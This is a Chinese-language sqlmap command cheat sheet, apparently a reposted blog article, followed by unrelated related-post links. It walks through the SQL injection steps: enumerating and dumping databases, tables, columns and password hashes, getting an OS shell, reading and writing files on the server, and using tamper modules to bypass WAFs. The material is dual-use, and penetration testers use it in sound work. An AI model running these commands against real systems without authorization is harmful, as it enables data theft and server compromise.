一、sqlmap常用基础命令

sqlmap Common operation command

以下命令顺序即为sql注入常见步骤。

sqlmap -u [“url”] --dbs #获取数据库
sqlmap -u [“url”] --current-user #获取当前用户名称 :
sqlmap -u [“url”] --current-db #获取当前数据库名称
sqlmap -u [“url”] -D [‘数据库名’] --tables   #列出表名 :
sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段
sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容

如果是Microsoft Access 可省略前三个步骤 且不需要-D参数

--------------------

cookie 注入 可添加 --cookie=["cookie内容"]

  • --cookie=["cookie的内容"]        设置cookie 值 通常配合获取数据库使用
--data        设置 POST 提交的值
-u        指定目标 URL
-b        获取 DBMS banner
--current-db        获取当前数据库
--current-user        获取当前数据库的用户
--tables        获取数据库里所有的表名
--columns        获取表里的所有字段
--dump        获取字段中的内容
--current-user        获取当前用户
-D [数据库名]       指定数据库名
-T  [表名]      指定表名
-C  [字段名]      指定字段名
--string       当查询可用时用来匹配页面中的字符串
--users        枚举所有用户
--passwords      枚举所有用户的密码hsah
--dbs      枚举数据库中的数据库名

GET型注入一般用 sqlmap -u "url"

POST型注入一般用 sqlmap -u "url" --data "POST参数"

如果需要增加cookie或其他请求头 可将请求保存到文本中假如为request.txt,则用sqlmap -r request.txt

二、sqlmap常用基础命令

--level 5  探测等级(1~5 默认为1,等级越高Payload越多,速度也比较慢)--is-dba   判断当前用户是否是管理员权限--roles    列出数据库管理员角色(仅适用与Oracle数据库)--referer  HTTP Referer头(伪造HTTP头中的Referer,当--level等级大于等于3时会通过伪造Referer来进行注入)--sql-shell 运行自定义SQL语句 用法:sqlmap -u url --sql-shell--os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQL、SQL Server)--file-read 从数据库服务器中读取文件(要知道文件绝对路径)--file-write "本地文件路径" --file-dest "远程绝对路径"   上传文件到数据库服务器中--tamper "模块名" bypass绕waf时使用 具体模块可参考书《Web安全攻防 渗透测试实战指南》P40~49页

转载于:https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html

sqlmap常用操作命令相关推荐

  1. 安装虚拟机及Linux常用操作命令

    一.实验环境 Windows10 ,VMware Workstation 12.1.1 ,Ubuntu kylin 16.04 二.实验内容与完成情况 1.新建用户Hadoop (1)安装时新建 (2 ...

  2. VMware Workstation下新建用户及Linux常用操作命令

    一.实验环境 Windows10 ,VMware Workstation 12.1.1 ,Ubuntu kylin 16.04 二.实验内容与完成情况 1.新建用户Hadoop (1)安装时新建 (2 ...

  3. Git常用操作命令----有备无患

    Git常用操作命令: 1)远程仓库相关命令 检出仓库:$ git clone git://github.com/jquery/jquery.git 查看远程仓库:$ git remote -v 添加远 ...

  4. git常用操作命令整理大全(含github操作)

    git常用操作命令整理大全

  5. Redis 常用操作命令

    Redis 常用操作命令 key 1 DEL key该命令用于在 key 存在时删除 key.2 DUMP key 序列化给定 key ,并返回被序列化的值.3 EXISTS key 检查给定 key ...

  6. LINUX中常用操作命令

    LINUX中常用操作命令 Linux简介及Ubuntu安装 常见指令 系统管理命令 打包压缩相关命令 关机/重启机器 Linux管道 Linux软件包管理 vim使用 用户及用户组管理 文件权限管理 ...

  7. svn 常用操作命令

    svn 常用操作命令 检出 svn checkout http://路径(目录或文件的全路径) [本地目录全路径] --username 用户名 svn checkout svn://路径(目录或文件 ...

  8. Redis 常用操作命令,非常详细

    转载自  Redis 常用操作命令,非常详细 下面总结并演示了 Redis 的 常用管理命令.key 操作.字符串.集合.列表.散列类型的操作命令. 你需要掌握的 Redis 知识 史上最全 Redi ...

  9. linux基本命令du,Linux常用操作命令汇总

    你还在为不知道Linux常用操作命令汇总而不知所措么?下面来是学习啦小编为大家收集的Linux常用操作命令汇总,欢迎大家阅读: Linux常用操作命令汇总 1.ls 命令 ls以默认方式显示当前目录文 ...

最新文章

  1. OPNET中的zigbee
  2. 一步步学习微软InfoPath2010和SP2010--第三章节--表单设计基础:处理InfoPath布局、控件和视图(4)--控件属性功能区...
  3. 宝塔php加入环境变量,宝塔面板如何配置 node.js 环境变量
  4. 【Python - GPU】基于Python的GPU加速并行计算 -- pyCUDA
  5. 深度学习笔记(49) 风格代价函数
  6. XBOX Series X规格如此强悍,如果被破解安装了win10,将对PC行业带来什么影响?
  7. kernel笔记——库文件与系统调用
  8. 数据持久化,序列化,反序列化,文件读写1
  9. mysql 使用gzip 压缩 文件,本地对 gzip 压缩的文件解压缩
  10. 南京邮电大学matlab实验报告,南京邮电大学通信与信息处理江苏省实验教学示范中心...
  11. 阿里云移动推送 - 异常记录
  12. 如何写出干净整洁的代码
  13. Windows安全加固系列---日志配置操作
  14. 深度学习AI美颜系列---美图秀秀AI美图之跨次元相机特效
  15. 【Coursera-Machine Learning】自用5
  16. scrapy中代理设置
  17. Cloudflare 远程浏览器隔离
  18. 业务流程管理工具的概览和比较分析
  19. 基于MATLAB完成卷积运算,基于Matlab的离散卷积
  20. MATLAB虚拟现实

热门文章

  1. 配置apache2目录
  2. mysql 逻辑型_17. 逻辑运算符
  3. qdialog 返回值_python-PyQt QDialog返回响应是或否
  4. cdh用户权限_0617-使用Sentry给Solr的collection赋予Query权限后查询异常分析
  5. 广联达2018模板算量步骤_工程人必须掌握:这9份软件算量教程+24份算量计算表,无偿分享...
  6. cdmp不停增长 oracle_Stream异常导致Oracle不断产生trc文件
  7. sql 实现两行数据作差
  8. 计算机视觉,图像处理 经典代码paper整理(很全很强大!)
  9. 全球及中国特斯拉产业销量预测及投资机遇调研报告2021-2027年
  10. 中国-中东欧国家特色农产品 云上国际农民丰收节贸易会